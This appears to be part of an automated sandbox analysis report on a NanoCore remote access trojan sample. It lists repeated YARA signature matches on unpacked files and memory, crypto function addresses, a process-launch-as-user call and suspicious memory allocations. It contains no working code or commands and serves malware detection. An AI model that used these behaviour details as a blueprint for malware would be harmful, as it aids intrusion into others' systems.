Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00380B77	6_2_00380B77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003824C0	6_2_003824C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00383D88	6_2_00383D88
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00385CA8	6_2_00385CA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00384638	6_2_00384638
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0038462A	6_2_0038462A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0038C708	6_2_0038C708
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00D8BB49	6_2_00D8BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0038F038	7_2_0038F038
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_003824C0	7_2_003824C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00380B77	7_2_00380B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00383D88	7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0038C118	7_2_0038C118
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00384638	7_2_00384638
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00384630	7_2_00384630
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00385CA8	7_2_00385CA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C20048	7_2_00C20048
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C25478	7_2_00C25478
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C22E30	7_2_00C22E30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C23560	7_2_00C23560
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C27D68	7_2_00C27D68
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C21370	7_2_00C21370
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C24C50	7_2_00C24C50
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C26C20	7_2_00C26C20
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C20021	7_2_00C20021
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C247C8	7_2_00C247C8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C247D8	7_2_00C247D8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C28998	7_2_00C28998
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C23550	7_2_00C23550
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C21368	7_2_00C21368
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C25F28	7_2_00C25F28
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0122BB49	7_2_0122BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 8_2_00250B77	8_2_00250B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 8_2_002524C0	8_2_002524C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CE018	9_2_001CE018
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CBBA8	9_2_001CBBA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001C43A0	9_2_001C43A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CAF90	9_2_001CAF90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001C3788	9_2_001C3788
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001C4458	9_2_001C4458
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CBC66	9_2_001CBC66
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062F59C	9_2_0062F59C
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_006277A0	9_2_006277A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062C9A0	9_2_0062C9A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_00626B88	9_2_00626B88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062DE90	9_2_0062DE90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062D5A8	9_2_0062D5A8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062D5B8	9_2_0062D5B8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062D676	9_2_0062D676
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062785E	9_2_0062785E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_01024300	9_2_01024300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_01023A10	9_2_01023A10
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0102035E	9_2_0102035E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_010202A0	9_2_010202A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_010236C0	9_2_010236C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0122BB49	9_2_0122BB49

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Code function: 7_2_00C26618 CreateProcessAsUserW,

7_2_00C26618

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
